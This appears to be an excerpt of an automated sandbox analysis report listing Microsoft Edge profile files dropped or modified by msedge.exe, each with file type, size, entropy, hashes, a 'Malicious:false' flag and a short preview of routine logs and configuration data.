                                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):309
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.2093172094700275
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEgwrR1CHhJ23oH+Tcwtk2WwnvB2KLlVEgh1Vq2PCHhJ23oH+Tcwtk2WwnvIFUv:k1NYebkxwnvFLsmVvBYebkxwnQFUv
                                                                                                                                                                                                                                                                                                                  MD5:13BE837BDF173C36639C03EFDA2E5AA1
                                                                                                                                                                                                                                                                                                                  SHA1:5EDDBD1EA1EC1F6BDA7501D2E0C4AD2A656E48EE
                                                                                                                                                                                                                                                                                                                  SHA-256:CDDFD440B8686DDE02427B851B77784CB23DC3264B80B44559C8339627EDDAEA
                                                                                                                                                                                                                                                                                                                  SHA-512:E1574C67BAA615699D0319A431C3A24CFD1E10D0927D5D2CA2F1F55FC9BF5C56D0830F7C9B111051A0DCB675BE8BFA809DA8696B3BD5BF619FF23AC1C488CC64
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:34.365 de0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/11/21-09:48:34.396 de0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                                  Size (bytes):358860
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.324607004021109
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rz:C1gAg1zfv7
                                                                                                                                                                                                                                                                                                                  MD5:DEA3EC7B4730365162FA1E36099AB72C
                                                                                                                                                                                                                                                                                                                  SHA1:A497314A2CEFE6B7756E9487709ECAF429CDA603
                                                                                                                                                                                                                                                                                                                  SHA-256:D1634D121FD7B4AE1D4BA5FEC8CD6CE6BD1D5FCE0C2B31B901F5571FF3300706
                                                                                                                                                                                                                                                                                                                  SHA-512:A55C3E0AE9E417579817153C28930F8D4DEBBA8B0CC2893B96D5749CA22AF72DE3975DBDBE03060768E4CD2960190F34163D164E73B263A584C0457B3CA3766E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):418
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                                  MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                                  SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                                  SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                                  SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.249444117272332
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEjDq2PCHhJ23oH+Tcwt8aPrqIFUt8YEj2Zmw+YEZkwOCHhJ23oH+Tcwt8amLJ:knvBYebL3FUt8/K/+/Z56YebQJ
                                                                                                                                                                                                                                                                                                                  MD5:16460EA0DCECE3F40141BAC2E265D67A
                                                                                                                                                                                                                                                                                                                  SHA1:9CB6CA369B3881D6255B6D2167515FD6D6A98260
                                                                                                                                                                                                                                                                                                                  SHA-256:631E623619FC842164D54D9068895289F840F0A57C1AB3EF12DE2474E0CD7D1C
                                                                                                                                                                                                                                                                                                                  SHA-512:1A7C2F11865AAF5ADEEA86A45B63EFD8A8C3537ECD9C2BC9AD62B189E767F70BD7EF57F32B3A46921FF236B18C9529C3B1F48A6EA57B51B4C8C093F33A840F03
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:28.925 16b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/21-09:48:28.925 16b4 Recovering log #3.2024/11/21-09:48:28.926 16b4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.249444117272332
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEjDq2PCHhJ23oH+Tcwt8aPrqIFUt8YEj2Zmw+YEZkwOCHhJ23oH+Tcwt8amLJ:knvBYebL3FUt8/K/+/Z56YebQJ
                                                                                                                                                                                                                                                                                                                  MD5:16460EA0DCECE3F40141BAC2E265D67A
                                                                                                                                                                                                                                                                                                                  SHA1:9CB6CA369B3881D6255B6D2167515FD6D6A98260
                                                                                                                                                                                                                                                                                                                  SHA-256:631E623619FC842164D54D9068895289F840F0A57C1AB3EF12DE2474E0CD7D1C
                                                                                                                                                                                                                                                                                                                  SHA-512:1A7C2F11865AAF5ADEEA86A45B63EFD8A8C3537ECD9C2BC9AD62B189E767F70BD7EF57F32B3A46921FF236B18C9529C3B1F48A6EA57B51B4C8C093F33A840F03
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:28.925 16b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/21-09:48:28.925 16b4 Recovering log #3.2024/11/21-09:48:28.926 16b4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):418
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                                  MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                                  SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                                  SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                                  SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.237757122976113
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEPwq2PCHhJ23oH+Tcwt865IFUt8YEPRZmw+YEvKkwOCHhJ23oH+Tcwt86+ULJ:kovBYeb/WFUt8/5/+/S56Yeb/+SJ
                                                                                                                                                                                                                                                                                                                  MD5:8694901236594FD7CD08AF98658D7DF7
                                                                                                                                                                                                                                                                                                                  SHA1:F8F52FC5BA108ECE2F34F8990650A43698C9F4AE
                                                                                                                                                                                                                                                                                                                  SHA-256:D079A9660D1F4A0A3642A6C94E0F809EA4DA60E873C701FD724D50051A614EE3
                                                                                                                                                                                                                                                                                                                  SHA-512:FC6C7C44C09B24B8D3CBC9F2E2395DC160931AA9D9CD8B6D36CA53D7F490B50F61318C6C031B3606496062AAA403CB80AD757448EF7883BF37A752DDA11689C9
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:28.928 16b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/21-09:48:28.928 16b4 Recovering log #3.2024/11/21-09:48:28.929 16b4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.237757122976113
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEPwq2PCHhJ23oH+Tcwt865IFUt8YEPRZmw+YEvKkwOCHhJ23oH+Tcwt86+ULJ:kovBYeb/WFUt8/5/+/S56Yeb/+SJ
                                                                                                                                                                                                                                                                                                                  MD5:8694901236594FD7CD08AF98658D7DF7
                                                                                                                                                                                                                                                                                                                  SHA1:F8F52FC5BA108ECE2F34F8990650A43698C9F4AE
                                                                                                                                                                                                                                                                                                                  SHA-256:D079A9660D1F4A0A3642A6C94E0F809EA4DA60E873C701FD724D50051A614EE3
                                                                                                                                                                                                                                                                                                                  SHA-512:FC6C7C44C09B24B8D3CBC9F2E2395DC160931AA9D9CD8B6D36CA53D7F490B50F61318C6C031B3606496062AAA403CB80AD757448EF7883BF37A752DDA11689C9
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:28.928 16b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/21-09:48:28.928 16b4 Recovering log #3.2024/11/21-09:48:28.929 16b4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1254
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                                  MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                                  SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                                  SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                                  SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):321
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.23092299989349
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEJZ4q2PCHhJ23oH+Tcwt8NIFUt8YEJZJZmw+YEJZDkwOCHhJ23oH+Tcwt8+eLJ:kJ6vBYebpFUt8/Jz/+/Jp56YebqJ
                                                                                                                                                                                                                                                                                                                  MD5:48A3A10E1C60ADFB854F712A9797247F
                                                                                                                                                                                                                                                                                                                  SHA1:FAA5DFEC0093048950E81B7FA5F7E841279D3FBE
                                                                                                                                                                                                                                                                                                                  SHA-256:1D6058C07A17896222DA5F3FB8F793FF6FB56E4F656AA3C5A6C77B09B719FC56
                                                                                                                                                                                                                                                                                                                  SHA-512:EF5653CC6972904BBBD2E5A8FE05FB77F15440F7321988670ABD3BB5B77A6AD445961BCFD0756C2C1913A1F2368E5B0D0EF7280119E08A75BF4FD17B54E14A98
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:29.532 6c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/21-09:48:29.532 6c0 Recovering log #3.2024/11/21-09:48:29.532 6c0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):321
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.23092299989349
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEJZ4q2PCHhJ23oH+Tcwt8NIFUt8YEJZJZmw+YEJZDkwOCHhJ23oH+Tcwt8+eLJ:kJ6vBYebpFUt8/Jz/+/Jp56YebqJ
                                                                                                                                                                                                                                                                                                                  MD5:48A3A10E1C60ADFB854F712A9797247F
                                                                                                                                                                                                                                                                                                                  SHA1:FAA5DFEC0093048950E81B7FA5F7E841279D3FBE
                                                                                                                                                                                                                                                                                                                  SHA-256:1D6058C07A17896222DA5F3FB8F793FF6FB56E4F656AA3C5A6C77B09B719FC56
                                                                                                                                                                                                                                                                                                                  SHA-512:EF5653CC6972904BBBD2E5A8FE05FB77F15440F7321988670ABD3BB5B77A6AD445961BCFD0756C2C1913A1F2368E5B0D0EF7280119E08A75BF4FD17B54E14A98
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:29.532 6c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/21-09:48:29.532 6c0 Recovering log #3.2024/11/21-09:48:29.532 6c0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):429
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                                  MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                                  SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                                  SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                                  SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6480676312452474
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:384:aj9P0GJP/KbtRcdgam6ICQkQerTjl8hj773pLLRKToaAu:adbP/7gye23l8F7NRKcC
                                                                                                                                                                                                                                                                                                                  MD5:54029574E862D0DDC10FFBFC08C67E17
                                                                                                                                                                                                                                                                                                                  SHA1:44B5BF81F695474ECEE4F626BF8C4EC6C5BC0C7B
                                                                                                                                                                                                                                                                                                                  SHA-256:C120D58A74A14355670286D985557C55B5C1814C6FB068B55813741C5911E44D
                                                                                                                                                                                                                                                                                                                  SHA-512:D8BF6371FA2EF91F3733BCFA66F95F3EC64FE222A38F5B07EC57514A761ECF3BCC794F043313C0BC065DD836AABB4A83E435FC5D60D8FDC1664ADBE926540859
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):405
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.31260602196323
                                                                                                                                                                                                                                                                                                                  Encrypted:false
